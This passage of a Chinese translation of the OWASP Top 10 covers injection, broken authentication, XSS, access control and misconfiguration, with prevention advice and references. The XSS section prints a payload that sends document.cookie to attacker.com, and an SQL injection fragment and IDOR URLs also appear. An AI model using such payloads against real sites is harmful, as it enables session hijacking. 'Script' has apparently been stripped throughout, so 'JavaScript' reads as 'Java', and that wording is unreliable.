'1'='1<\/p>\n<p>\u8fd9\u6837\u67e5\u8be2\u8bed\u53e5\u7684\u610f\u4e49\u5c31\u53d8\u6210\u4e86\u4eceaccounts\u8868\u4e2d\u8fd4\u56de\u6240\u6709\u7684 \u8bb0\u5f55\u3002\u66f4\u5371\u9669\u7684\u653b\u51fb\u53ef\u80fd\u5bfc\u81f4\u6570\u636e\u88ab\u7be1\u6539\u751a\u81f3\u662f\u5b58\u50a8\u8fc7\u7a0b \u88ab\u8c03\u7528\u3002<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP<\/p>\n<p>\u2022 OWASP SQL Injection Prevention Cheat Sheet <\/p>\n<p>\u2022 OWASP Query Parameterization Cheat Sheet <\/p>\n<p>\u2022 OWASP Command Injection Article <\/p>\n<p>\u2022 OWASP XXE Prevention Cheat Sheet <\/p>\n<p>\u2022 OWASP Testing Guide: Chapter on SQL Injection Testing<\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 CWE Entry 77 on Command Injection <\/p>\n<p>\u2022 CWE Entry 89 on SQL Injection <\/p>\n<p>\u2022 CWE Entry 564 on Hibernate Injection <\/p>\n<p>\u2022 CWE Entry 611 on Improper Restriction of XXE <\/p>\n<p>\u2022 CWE Entry 917 on Expression Language Injection<\/p>\n<p>A2<\/p>\n<p>\u5931\u6548\u7684\u8eab\u4efd\u8ba4\u8bc1\u548c\u4f1a\u8bdd\u7ba1\u7406<\/p>\n<p>\u6211\u5b58\u5728\u4f1a\u8bdd\u52ab\u6301\u6f0f\u6d1e\u4e48?<\/p>\n<p>\u5982\u4f55\u80fd\u591f\u4fdd\u62a4\u7528\u6237\u51ed\u8bc1\u548c\u4f1a\u8bddID\u7b49\u4f1a\u8bdd\u7ba1\u7406\u8d44\u4ea7\u5462\uff1f\u4ee5\u4e0b \u60c5\u51b5\u53ef\u80fd\u4ea7\u751f\u6f0f\u6d1e\uff1a<\/p>\n<p>1.\u7528\u6237\u8eab\u4efd\u9a8c\u8bc1\u51ed\u8bc1\u6ca1\u6709\u4f7f\u7528\u54c8\u5e0c\u6216\u52a0\u5bc6\u4fdd\u62a4\u3002 \u8be6\u89c1A6\u3002<\/p>\n<p>2.\u8ba4\u8bc1\u51ed\u8bc1\u53ef\u731c\u6d4b\uff0c\u6216\u8005\u80fd\u591f\u901a\u8fc7\u8584\u5f31\u7684\u7684\u5e10\u6237\u7ba1\u7406\u529f\u80fd\uff08\u4f8b\u5982\u8d26\u6237\u521b\u5efa\u3001\u5bc6\u7801\u4fee\u6539\u3001\u5bc6\u7801\u6062\u590d, \u5f31\u4f1a\u8bddID\uff09\u91cd\u5199\u3002<\/p>\n<p>3.\u4f1a\u8bddID\u66b4\u9732\u5728URL\u91cc\uff08\u4f8b\u5982, URL\u91cd\u5199\uff09\u3002<\/p>\n<p>4.\u4f1a\u8bddID\u5bb9\u6613\u53d7\u5230\u4f1a\u8bdd\u56fa\u5b9a\uff08session fixation\uff09 \u7684\u653b\u51fb\u3002<\/p>\n<p>5.\u4f1a\u8bddID\u6ca1\u6709\u8d85\u65f6\u9650\u5236\uff0c\u6216\u8005\u7528\u6237\u4f1a\u8bdd\u6216\u8eab\u4efd\u9a8c\u8bc1\u4ee4\u724c\u7279\u522b\u662f\u5355\u70b9\u767b\u5f55\u4ee4\u724c\u5728\u7528\u6237\u6ce8\u9500\u65f6\u6ca1\u6709\u5931\u6548\u3002<\/p>\n<p>6.\u6210\u529f\u6ce8\u518c\u540e,\u4f1a\u8bddID\u6ca1\u6709\u8f6e\u8f6c\u3002<\/p>\n<p>7.\u5bc6\u7801\u3001\u4f1a\u8bddID\u548c\u5176\u4ed6\u8ba4\u8bc1\u51ed\u636e\u4f7f\u7528\u672a\u52a0\u5bc6\u8fde\u63a5\u4f20\u8f93\u3002\u8be6\u89c1A6\u3002<\/p>\n<p>\u66f4\u591a\u8be6\u60c5\u8bf7\u89c1ASVS\u8981\u6c42\u90e8\u5206V2\u548cV3 \u3002<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62?<\/p>\n<p>\u5bf9\u4f01\u4e1a\u6700\u4e3b\u8981\u7684\u5efa\u8bae\u662f\u8ba9\u5f00\u53d1\u4eba\u5458\u4f7f\u7528\u5982\u4e0b\u8d44\u6e90\uff1a<\/p>\n<p>1.\u4e00\u5957\u5355\u4e00\u7684\u5f3a\u5927\u7684\u8ba4\u8bc1\u548c\u4f1a\u8bdd\u7ba1\u7406\u63a7\u5236\u7cfb\u7edf\u3002\u8fd9\u5957\u63a7 \u5236\u7cfb\u7edf\u5e94:<\/p>\n<p>a) \u6ee1\u8db3OWASP\u7684\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u9a8c\u8bc1\u6807\u51c6\uff08ASVS\uff09 \u4e2dV2\uff08\u8ba4\u8bc1\uff09\u548cV3\uff08\u4f1a\u8bdd\u7ba1\u7406\uff09\u4e2d\u5236\u5b9a\u7684\u6240 \u6709\u8ba4\u8bc1\u548c\u4f1a\u8bdd\u7ba1 \u7406\u7684\u8981\u6c42\u3002<\/p>\n<p>b) \u5177\u6709\u7b80\u5355\u7684\u5f00\u53d1\u754c\u9762ESAPI\u8ba4\u8bc1\u5668\u548c\u7528\u6237 API \u662f\u53ef\u4ee5\u4eff\u7167\u3001\u4f7f\u7528\u6216\u6269\u5c55\u7684\u597d\u8303\u4f8b\u3002<\/p>\n<ol start=\"2\">\n<li>\u4f01\u4e1a\u540c\u6837\u4e5f\u8981\u505a\u51fa\u5de8\u5927\u52aa\u529b\u6765\u907f\u514d\u8de8\u7ad9\u6f0f\u6d1e\uff0c\u56e0\u4e3a\u8fd9 \u4e00\u6f0f\u6d1e\u53ef\u4ee5\u7528\u6765\u76d7\u7a83\u7528\u6237\u4f1a\u8bddID\u3002\u8be6\u89c1A3\u3002<\/li>\n<\/ol>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u6848\u4f8b #1\uff1a\u673a\u7968\u9884\u8ba2\u5e94\u7528\u7a0b\u5e8f\u652f\u6301URL\u91cd\u5199\uff0c\u628a\u4f1a\u8bddID\u653e\u5728 URL\u91cc\uff1a<\/p>\n<p><a href=\"http:\/\/example.com\/sale\/saleitems;jsessionid\">http:\/\/example.com\/sale\/saleitems;jsessionid<\/a>=<\/p>\n<p>2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii<\/p>\n<p>\u8be5\u7f51\u7ad9\u4e00\u4e2a\u7ecf\u8fc7\u8ba4\u8bc1\u7684\u7528\u6237\u5e0c\u671b\u8ba9\u4ed6\u670b\u53cb\u77e5\u9053\u8fd9\u4e2a\u673a\u7968\u6253 \u6298\u4fe1\u606f\u3002\u4ed6\u5c06\u4e0a\u9762\u94fe\u63a5\u901a\u8fc7\u90ae\u4ef6\u53d1\u7ed9\u4ed6\u670b\u53cb\u4eec\uff0c\u5e76\u4e0d\u77e5\u9053 \u81ea\u5df1\u5df2\u7ecf\u6cc4\u6f0f\u4e86\u81ea\u5df1\u7684\u4f1a\u8bddID\u3002 \u5f53\u4ed6\u7684\u670b\u53cb\u4eec\u4f7f\u7528\u4e0a\u9762\u7684 \u94fe\u63a5\u65f6\uff0c\u4ed6\u4eec\u5c06\u4f1a\u4f7f\u7528\u4ed6\u7684\u4f1a\u8bdd\u548c\u4fe1\u7528\u5361\u3002<\/p>\n<p>\u6848\u4f8b#2\uff1a\u5e94\u7528\u7a0b\u5e8f\u8d85\u65f6\u8bbe\u7f6e\u4e0d\u5f53\u3002 \u7528\u6237\u4f7f\u7528\u516c\u5171\u8ba1\u7b97\u673a \u8bbf\u95ee\u7f51\u7ad9\u3002\u79bb\u5f00\u65f6\uff0c\u8be5\u7528\u6237\u6ca1\u6709\u70b9\u51fb\u9000\u51fa\uff0c\u800c\u662f\u76f4\u63a5\u5173\u95ed \u6d4f\u89c8\u5668\u3002\u653b\u51fb\u8005\u5728\u4e00\u4e2a\u5c0f\u65f6\u540e\u80fd\u4f7f\u7528\u76f8\u540c\u6d4f\u89c8\u5668\u901a\u8fc7\u8eab\u4efd\u8ba4\u8bc1\u3002<\/p>\n<p>\u6848\u4f8b#3\uff1a\u5185\u90e8\u6216\u5916\u90e8\u653b\u51fb\u8005\u8fdb\u5165\u7cfb\u7edf\u7684\u5bc6\u7801\u6570\u636e\u5e93. \u5b58\u50a8 \u5728\u6570\u636e\u5e93\u4e2d\u7684\u7528\u6237\u5bc6\u7801\u6ca1\u6709\u88ab\u52a0\u5bc6, \u6240\u6709\u7528\u6237\u7684\u5bc6\u7801\u90fd\u88ab \u653b\u51fb\u8005\u83b7\u5f97\u3002<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP<\/p>\n<p>\u5b8c\u6574\u7684\u53c2\u8003\u8d44\u6599\uff0c\u89c1 ASVS requirements areas for Authentication (V2) and Session Management (V3).<\/p>\n<p>\u2022 OWASP Authentication Cheat Sheet <\/p>\n<p>\u2022 OWASP Forgot Password Cheat Sheet <\/p>\n<p>\u2022 OWASP Password Storage Cheat Sheet <\/p>\n<p>\u2022 OWASP Session Management Cheat Sheet<\/p>\n<p>\u2022 OWASP Testing Guide: Chapter on Authentication<\/p>\n<p>\u5176\u4ed6<\/p>\n<p>\u2022 CWE Entry 287 on Improper Authentication <\/p>\n<p>\u2022 CWE Entry 384 on Session Fixation<\/p>\n<p>A3<\/p>\n<p>\u8de8\u7ad9\u811a\u672c (XSS)<\/p>\n<p>\u6211\u5b58\u5728XSS\u6f0f\u6d1e\u5417?<\/p>\n<p>\u5982\u679c\u60a8\u7684\u670d\u52a1\u5668\u7aef\u4ee3\u7801\u4f7f\u7528\u7528\u6237\u63d0\u4f9b\u7684\u8f93\u5165\u4f5c\u4e3aHTML\u8f93\u51fa\u7684\u4e00\u90e8\u5206\uff0c\u5e76\u4e14\u4e0d\u4f7f\u7528\u4e0a\u4e0b\u6587\u76f8\u5173\u7684\u8f6c\u4e49\u6765\u786e\u4fdd\u5b83\u65e0\u6cd5\u8fd0\u884c\uff0c\u5219\u60a8\u5f88\u5bb9\u6613\u53d7\u5230\u670d\u52a1\u5668XSS\u7684\u5f71\u54cd\u3002\u5982\u679c\u7f51\u9875\u4f7f\u7528Java\u6765\u52a8\u6001\u5730\u5c06\u653b\u51fb\u8005\u53ef\u63a7\u6570\u636e\u6dfb\u52a0\u5230\u9875\u9762\uff0c\u90a3\u4e48\u60a8\u53ef\u80fd\u9700\u8981\u6ce8\u610fClient XSS\u3002 \u7406\u60f3\u60c5\u51b5\u4e0b\uff0c\u60a8\u5c06\u907f\u514d\u5c06\u653b\u51fb\u8005\u53ef\u63a7\u6570\u636e\u53d1\u9001\u5230\u4e0d\u5b89\u5168\u7684Java API\uff0c\u4f46\u662f\u53ef\u4ee5\u4f7f\u7528\u8f93\u5165\u9a8c\u8bc1\u6765\u8f6c\u4e49\uff08\u5e76\u5728\u8f83\u5c0f\u7a0b\u5ea6\u4e0a\uff09\u8fdb\u884c\u8f93\u5165\u9a8c\u8bc1\u3002<\/p>\n<p>\u81ea\u52a8\u5316\u5de5\u5177\u80fd\u591f\u81ea\u52a8\u627e\u5230\u4e00\u4e9b\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002\u7136\u800c\uff0c\u6bcf\u4e00\u4e2a\u5e94\u7528\u7a0b\u5e8f\u4f7f\u7528\u4e0d\u540c\u7684\u65b9\u5f0f\u751f\u6210\u8f93\u51fa\u9875\u9762\uff0c\u5e76\u4e14\u4f7f\u7528\u4e0d\u540c \u7684\u6d4f\u89c8\u5668\u7aef\u89e3\u91ca\u5668\uff0c\u4f8b\u5982Java, ActiveX, Flash,\u548c Silverlight\uff0c\u8fd9\u4f7f\u5f97\u81ea\u52a8\u68c0\u6d4b\u53d8\u5f97\u5f88\u56f0\u96be\u3002\u56e0\u6b64\uff0c\u8981\u60f3\u8fbe\u5230 \u5168\u9762\u8986\u76d6\uff0c\u5fc5\u987b\u4f7f\u7528\u4e00\u79cd\u7ed3\u5408\u7684\u65b9\u5f0f\uff0c\u5728\u81ea\u52a8\u68c0\u6d4b\u7684\u57fa\u7840 \u4e0a\uff0c\u540c\u65f6\u91c7\u7528\u4eba\u5de5\u4ee3\u7801\u5ba1\u6838\u548c\u624b\u52a8\u6e17\u900f\u6d4b\u8bd5\u3002<\/p>\n<p>\u7c7b\u4f3cAJAX\u7684web2.0\u6280\u672f\u4f7f\u5f97\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u66f4\u96be\u901a\u8fc7\u81ea\u52a8\u5de5\u5177\u68c0\u6d4b\u5230\u3002<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62XSS?<\/p>\n<p>\u9632\u6b62XSS\u9700\u8981\u5c06\u4e0d\u53ef\u4fe1\u6570\u636e\u4e0e\u52a8\u6001\u7684\u6d4f\u89c8\u5668\u5185\u5bb9\u533a\u5206\u5f00\u3002<\/p>\n<p>1.\u4e3a\u4e86\u907f\u514d Server XSS,\u6700\u597d\u7684\u529e\u6cd5\u662f\u6839\u636e\u6570\u636e\u5c06\u8981\u7f6e\u4e8e\u7684HTML\u4e0a\u4e0b\u6587\uff08\u5305\u62ec \u4e3b\u4f53\u3001\u5c5e\u6027\u3001Java\u3001CSS\u6216URL\uff09\u5bf9\u6240\u6709\u7684\u4e0d\u53ef\u4fe1 \u6570\u636e\u8fdb\u884c\u6070\u5f53\u7684\u8f6c\uff08escape\uff09\u3002\u66f4\u591a\u5173\u4e8e\u6570\u636e\u8f6c\u4e49\u6280\u672f\u7684\u4fe1\u606f\u89c1OWASP DOM XSS Prevention Cheat Sheet\u3002<\/p>\n<p>2.\u4e3a\u4e86\u907f\u514dClient XSS,\u9996\u9009\u65b9\u6848\u662f\u907f\u514d\u5c06\u4e0d\u53d7\u4fe1\u4efb\u7684\u6570\u636e\u4f20\u9012\u7ed9\u53ef\u751f\u6210\u6d3b\u52a8\u5185\u5bb9Java\u548c\u5176\u4ed6\u6d4f\u89c8\u5668API\u3002 \u5f53\u65e0\u6cd5\u907f\u514d\u8fd9\u79cd\u60c5\u51b5\u65f6\uff0c\u7c7b\u4f3c\u7684\u654f\u611f\u8f6c\u4e49\u6280\u672f\u53ef\u4ee5\u5e94\u7528\u4e8e\u6d4f\u89c8\u5668API\uff0c\u5982\u57fa\u4e8eOWASP DOM based XSS Prevention Cheat Sheet \u3002<\/p>\n<p>3.\u66f4\u591a\u5185\u5bb9\u8bf7\u53c2\u8003OWASP \u7684 AntiSamy \u6216\u8005 Java HTML Sanitizer\u9879\u76ee\u3002<\/p>\n<p>4.\u8003\u8651\u4f7f\u7528\u5185\u5bb9\u5b89\u5168\u7b56\u7565\uff08CSP\uff09\u6765\u62b5\u5fa1\u6574\u4e2a\u7f51\u7ad9\u7684\u8de8 \u7ad9\u811a\u672c\u653b\u51fb\u3002<\/p>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u5e94\u7528\u7a0b\u5e8f\u5728\u4e0b\u9762HTML\u4ee3\u7801\u6bb5\u7684\u6784\u9020\u4e2d\u4f7f\u7528\u672a\u7ecf\u9a8c\u8bc1\u6216\u8f6c \u4e49\u7684\u4e0d\u53ef\u4fe1\u7684\u6570\u636e\uff1a<\/p>\n<p>\uff08String\uff09 page += &quot;&lt;input name='creditcard' type='TEXT\u2018 value='&quot; + request.getParameter\uff08&quot;CC&quot;\uff09+ &quot;'&gt;&quot;;<\/p>\n<p>\u653b\u51fb\u8005\u5728\u6d4f\u89c8\u5668\u4e2d\u4fee\u6539\u201cCC\u201d \u53c2\u6570\u4e3a\u5982\u4e0b\u503c\uff1a<\/p>\n<p>'&gt;&lt;&gt;document.location='<a href=\"http:\/\/www.attacker.com\/cgi-bin\/cookie.cgi\">http:\/\/www.attacker.com\/cgi-bin\/cookie.cgi<\/a>? foo='+document.cookie&lt;\/&gt;'.<\/p>\n<p>\u8fd9\u5bfc\u81f4\u53d7\u5bb3\u8005\u7684\u4f1a\u8bddID\u88ab\u53d1\u9001\u5230\u653b\u51fb\u8005\u7684\u7f51\u7ad9\uff0c\u4f7f\u5f97\u653b\u51fb \u8005\u80fd\u591f\u52ab\u6301\u7528\u6237\u5f53\u524d\u4f1a\u8bdd\u3002<\/p>\n<p>\u8bf7\u6ce8\u610f\u653b\u51fb\u8005\u540c\u6837\u80fd\u4f7f\u7528\u8de8\u7ad9\u811a\u672c\u653b\u7834\u5e94\u7528\u7a0b\u5e8f\u53ef\u80fd\u4f7f \u7528\u7684\u4efb\u4f55\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\uff08CSRF\uff09\u9632\u5fa1\u673a\u5236\u3002CSRF\u7684\u8be6\u7ec6\u60c5 \u51b5\u89c1A8<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP<\/p>\n<p>\u2022 OWASP Types of Cross-Site ing <\/p>\n<p>\u2022 OWASP XSS Prevention Cheat Sheet<\/p>\n<p>\u2022 OWASP DOM based XSS Prevention Cheat Sheet<\/p>\n<p>\u2022 OWASP Java Encoder API<\/p>\n<p>\u2022 ASVS: Output Encoding\/Escaping Requirements (V6) <\/p>\n<p>\u2022 OWASP AntiSamy: Sanitization Library <\/p>\n<p>\u2022 Testing Guide: 1st 3 Chapters on Data Validation Testing <\/p>\n<p>\u2022 OWASP Code Review Guide: Chapter on XSS Review <\/p>\n<p>\u2022 OWASP XSS Filter Evasion Cheat Sheet<\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 CWE Entry 79 on Cross-Site ing<\/p>\n<p>A4<\/p>\n<p>\u5931\u6548\u7684\u8bbf\u95ee\u63a7\u5236<\/p>\n<p>\u6211\u5b58\u5728\u4e48?<\/p>\n<p>\u67e5\u627e\u5e94\u7528\u7a0b\u5e8f\u662f\u5426\u5bb9\u6613\u53d7\u5230\u8bbf\u95ee\u63a7\u5236\u6f0f\u6d1e\u7684\u6700\u4f73\u65b9\u6cd5\u662f\u9a8c\u8bc1\u6240\u6709\u6570\u636e\u548c\u51fd\u6570\u5f15\u7528\u662f\u5426\u5177\u6709\u9002\u5f53\u7684\u9632\u5fa1\u3002 \u8981\u786e\u5b9a\u4f60\u662f\u5426\u5bb9\u6613\u53d7\u5230\u653b\u51fb\uff0c\u8bf7\u8003\u8651:<\/p>\n<p>1.\u5bf9\u4e8e\u6570\u636e\u5f15\u7528\uff0c\u5e94\u7528\u7a0b\u5e8f\u662f\u5426\u901a\u8fc7\u4f7f\u7528\u6620\u5c04\u8868\u6216\u8bbf\u95ee\u63a7\u5236\u68c0\u67e5\u786e\u4fdd\u7528\u6237\u83b7\u5f97\u6388\u6743\uff0c\u4ee5\u786e\u4fdd\u7528\u6237\u5bf9\u8be5\u6570\u636e\u8fdb\u884c\u6388\u6743 <\/p>\n<p>2.\u5bf9\u4e8e\u975e\u516c\u5171\u529f\u80fd\u8bf7\u6c42\uff0c\u5e94\u7528\u7a0b\u5e8f\u662f\u5426\u786e\u4fdd\u7528\u6237\u8fdb\u884c\u4e86\u8eab\u4efd\u9a8c\u8bc1\uff0c\u5e76\u5177\u6709\u4f7f\u7528\u8be5\u529f\u80fd\u6240\u9700\u7684\u89d2\u8272\u6216\u6743\u9650\uff1f<\/p>\n<p>\u5e94\u7528\u7a0b\u5e8f\u7684\u4ee3\u7801\u5ba1\u67e5\u53ef\u4ee5\u9a8c\u8bc1\u8fd9\u4e9b\u63a7\u4ef6\u662f\u5426\u6b63\u786e\u5b9e\u65bd\uff0c\u5e76\u4e14\u5728\u4efb\u4f55\u5730\u65b9\u90fd\u9700\u8981\u8fdb\u884c\u5ba1\u8ba1\u3002 \u624b\u52a8\u6d4b\u8bd5\u5bf9\u4e8e\u8bc6\u522b\u8bbf\u95ee\u63a7\u5236\u7f3a\u9677\u4e5f\u662f\u6709\u6548\u7684\u3002 \u81ea\u52a8\u5316\u5de5\u5177\u901a\u5e38\u4e0d\u4f1a\u627e\u5230\u8fd9\u6837\u7684\u7f3a\u9677\uff0c\u56e0\u4e3a\u4ed6\u4eec\u65e0\u6cd5\u8bc6\u522b\u9700\u8981\u4ec0\u4e48\u4fdd\u62a4\u6216\u4ec0\u4e48\u662f\u5b89\u5168\u7684\u6216\u4e0d\u5b89\u5168\u7684\u3002<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62?<\/p>\n<p>\u9632\u6b62\u8bbf\u95ee\u63a7\u5236\u7f3a\u9677\u3002\u9700\u8981\u9009\u62e9\u4e00\u4e2a\u9002\u5f53\u7684\u65b9\u6cd5 \u6765\u4fdd\u62a4\u6bcf\u4e00\u4e2a\u7528\u6237\u53ef\u8bbf\u95ee\u7684\u5bf9\u8c61\uff08\u5982\u5bf9\u8c61\u53f7\u7801\u3001\u6587\u4ef6\u540d\uff09 \u3002<\/p>\n<p>1.\u68c0\u67e5\u8bbf\u95ee\u3002\u4efb\u4f55\u6765\u81ea\u4e0d\u53ef\u4fe1\u6e90\u7684\u76f4\u63a5\u5bf9\u8c61\u5f15\u7528\u90fd\u5fc5\u987b \u901a\u8fc7\u8bbf\u95ee\u63a7\u5236\u68c0\u6d4b\uff0c\u786e\u4fdd\u8be5\u7528\u6237\u5bf9\u8bf7\u6c42\u7684\u5bf9\u8c61\u6709\u8bbf\u95ee \u6743\u9650\u3002<\/p>\n<p>2.\u4f7f\u7528\u57fa\u4e8e\u7528\u6237\u6216\u8005\u4f1a\u8bdd\u7684\u95f4\u63a5\u5bf9\u8c61\u5f15\u7528\u3002\u8fd9\u6837\u80fd\u9632\u6b62 \u653b\u51fb\u8005\u76f4\u63a5\u653b\u51fb\u672a\u6388\u6743\u8d44\u6e90\u3002\u4f8b\u5982\uff0c\u4e00\u4e2a\u4e0b\u62c9\u5217\u8868\u5305 \u542b6\u4e2a\u6388\u6743\u7ed9\u5f53\u524d\u7528\u6237\u7684\u8d44\u6e90\uff0c\u5b83\u53ef\u4ee5\u4f7f\u7528\u6570\u5b571-6\u6765 \u6307\u793a\u54ea\u4e2a\u662f\u7528\u6237\u9009\u62e9\u7684\u503c\uff0c\u800c\u4e0d\u662f\u4f7f\u7528\u8d44\u6e90\u7684\u6570\u636e\u5e93 \u5173\u952e\u5b57\u6765\u8868\u793a\u3002\u5728\u670d\u52a1\u5668\u7aef\uff0c\u5e94\u7528\u7a0b\u5e8f\u9700\u8981\u5c06\u6bcf\u4e2a\u7528 \u6237\u7684\u95f4\u63a5\u5f15\u7528\u6620\u5c04\u5230\u5b9e\u9645\u7684\u6570\u636e\u5e93\u5173\u952e\u5b57\u3002OWASP\u7684 ESAPI\u5305\u542b\u4e86\u4e24\u79cd\u5e8f\u5217\u548c\u968f\u673a\u8bbf\u95ee\u5f15\u7528\u6620\u5c04\uff0c\u5f00\u53d1\u4eba\u5458 \u53ef\u4ee5\u7528\u6765\u6d88\u9664\u76f4\u63a5\u5bf9\u8c61\u5f15\u7528\u3002 <\/p>\n<p>3.\u81ea\u52a8\u9a8c\u8bc1 \u3002\u5229\u7528\u81ea\u52a8\u5316\u6765\u9a8c\u8bc1\u6b63\u786e\u7684\u6388\u6743\u90e8\u7f72\u3002 \u8fd9\u8981\u6210\u4e3a\u4e60\u60ef\u3002<\/p>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u6848\u4f8b #1:\u5e94\u7528\u7a0b\u5e8f\u5728\u8bbf\u95ee\u5e10\u6237\u4fe1\u606f\u7684SQL\u8c03\u7528\u4e2d\u4f7f\u7528\u672a\u9a8c\u8bc1\u6570\u636e\uff1a<\/p>\n<p>pstmt.setString(1, request.getparameter(&quot;acct&quot;));<\/p>\n<p>ResultSet results = pstmt.executeQuery();<\/p>\n<p>\u653b\u51fb\u8005\u80fd\u8f7b\u6613\u5728\u6d4f\u89c8\u5668\u5c06 \u201cacct\u201d \u53c2\u6570\u4fee\u6539\u6210\u4ed6\u6240\u60f3\u8981\u7684 \u4efb\u4f55\u8d26\u6237\u53f7\u7801\u3002\u5982\u679c\u5e94\u7528\u7a0b\u5e8f\u6ca1\u6709\u8fdb\u884c\u6070\u5f53\u7684\u9a8c\u8bc1\uff0c\u653b\u51fb \u8005\u5c31\u80fd\u8bbf\u95ee\u4efb\u4f55\u7528\u6237\u7684\u8d26\u6237\uff0c\u800c\u4e0d\u4ec5\u4ec5\u662f\u8be5\u76ee\u6807\u7528\u6237\u7684\u8d26 \u6237\u3002<\/p>\n<p><a href=\"http:\/\/example.com\/app\/accountInfo?acct=notmyacct\">http:\/\/example.com\/app\/accountInfo?acct=notmyacct<\/a><\/p>\n<p>\u6848\u4f8b #2:\u653b\u51fb\u8005\u53ea\u662f\u7b80\u5355\u7684\u5f3a\u5236\u6d4f\u89c8\u76ee\u6807URL\u3002 \u8fd8\u9700\u8981\u7ba1\u7406\u5458\u6743\u9650\u624d\u80fd\u8bbf\u95ee\u7684\u7ba1\u7406\u9875\u9762\u3002<\/p>\n<p><a href=\"http:\/\/example.com\/app\/getappInfo\">http:\/\/example.com\/app\/getappInfo<\/a><\/p>\n<p><a href=\"http:\/\/example.com\/app\/admin_getappInfo\">http:\/\/example.com\/app\/admin_getappInfo<\/a><\/p>\n<p>\u5982\u679c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u7528\u6237\u53ef\u4ee5\u8bbf\u95ee\u4efb\u4f55\u4e00\u4e2a\u9875\u9762\uff0c\u8fd9\u662f\u4e00\u4e2a\u7f3a\u9677\u3002 \u5982\u679c\u975e\u7ba1\u7406\u5458\u53ef\u4ee5\u8bbf\u95ee\u7ba1\u7406\u9875\u9762\uff0c\u8fd9\u4e5f\u662f\u4e00\u4e2a\u7f3a\u9677\u3002<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP<\/p>\n<p>\u2022 OWASP Top 10-2007 on Insecure Direct Object References <\/p>\n<p>\u2022 OWASP Top 10-2007 on Function Level Access Control <\/p>\n<p>\u2022 ESAPI Access Reference Map API <\/p>\n<p>\u2022 ESAPI Access Control API(See isAuthorizedForData(), isAuthorizedForFile(), isAuthorizedForFunction() )<\/p>\n<p>For additional access control requirements, see the ASVS requirements area for Access Control (V4).<\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 CWE Entry 285 on Improper Access Control (Authorization) <\/p>\n<p>\u2022 CWE Entry 639 on Insecure Direct Object References <\/p>\n<p>\u2022 CWE Entry 22 on Path Traversal (\u4e00\u4e2a\u76f4\u63a5\u5bf9\u8c61\u5f15\u7528\u653b\u51fb\u7684\u4f8b\u5b50)<\/p>\n<p>A5<\/p>\n<p>\u5b89\u5168\u914d\u7f6e\u9519\u8bef<\/p>\n<p>\u6211\u6613\u53d7\u5230\u653b\u51fb\u5417?<\/p>\n<p>\u60a8\u7684\u5e94\u7528\u7a0b\u5e8f\u662f\u5426\u5bf9\u6574\u4e2a\u7a0b\u5e8f\u5806\u6808\u5b9e\u65bd\u4e86\u6070\u5f53\u7684\u5b89\u5168\u52a0\u56fa \u63aa\u65bd\uff1f\u8fd9\u4e9b\u63aa\u65bd\u5305\u62ec:<\/p>\n<p>1.\u662f\u5426\u6709\u8f6f\u4ef6\u6ca1\u6709\u88ab\u53ca\u65f6\u66f4\u65b0\uff1f\u8fd9\u5305\u62ec\u64cd\u4f5c\u7cfb\u7edf\u3001Web\/ \u5e94\u7528\u670d\u52a1\u5668\u3001\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u3001\u5e94\u7528\u7a0b\u5e8f\u548c\u5176\u5b83\u6240\u6709 \u7684\u4ee3\u7801\u5e93\u6587\u4ef6\uff08\u8be6\u89c12017-A9\uff09\u3002<\/p>\n<p>2.\u662f\u5426\u4f7f\u7528\u6216\u5b89\u88c5\u4e86\u4e0d\u5fc5\u8981\u7684\u529f\u80fd\uff08\u4f8b\u5982\uff0c\u7aef\u53e3\u3001\u670d\u52a1\u3001 \u7f51\u9875\u3001\u5e10\u6237\u3001\u6743\u9650\uff09? <\/p>\n<p>3.\u9ed8\u8ba4\u5e10\u6237\u7684\u5bc6\u7801\u662f\u5426\u4ecd\u7136\u53ef\u7528\u6216\u6ca1\u6709\u66f4\u6539\uff1f <\/p>\n<p>4.\u4f60\u7684\u9519\u8bef\u5904\u7406\u8bbe\u7f6e\u662f\u5426\u9632\u6b62\u5806\u6808\u8ddf\u8e2a\u548c\u5176\u4ed6\u542b\u6709\u5927\u91cf \u4fe1\u606f\u7684\u9519\u8bef\u6d88\u606f\u88ab\u6cc4\u9732? <\/p>\n<p>5.\u4f60\u7684\u5f00\u53d1\u6846\u67b6\uff08\u6bd4\u5982\uff1aStruts\u3001Spring\u3001ASP.NET\uff09\u548c\u5e93 \u6587\u4ef6\u4e2d\u7684\u5b89\u5168\u8bbe\u7f6e\u662f\u5426\u7406\u89e3\u6b63\u786e\u5e76\u914d\u7f6e\u6070\u5f53\uff1f<\/p>\n<p>\u7f3a\u5c11\u4e00\u4e2a\u534f\u5b9a\u7684\u3001\u53ef\u91cd\u590d\u7684\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u914d\u7f6e\u7684\u8fc7\u7a0b\uff0c\u7cfb \u7edf\u5c06\u5904\u4e8e\u9ad8\u98ce\u9669\u4e2d\u3002<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62?<\/p>\n<p>\u4e3b\u8981\u7684\u5efa\u8bae\u5efa\u7acb\u5728\u4ee5\u4e0b\u51e0\u4e2a\u65b9\u9762:<\/p>\n<p>1.\u4e00\u4e2a\u53ef\u4ee5\u5feb\u901f\u4e14\u6613\u4e8e\u90e8\u7f72\u5728\u53e6\u4e00\u4e2a\u9501\u5b9a\u73af\u5883\u7684\u53ef\u91cd\u590d 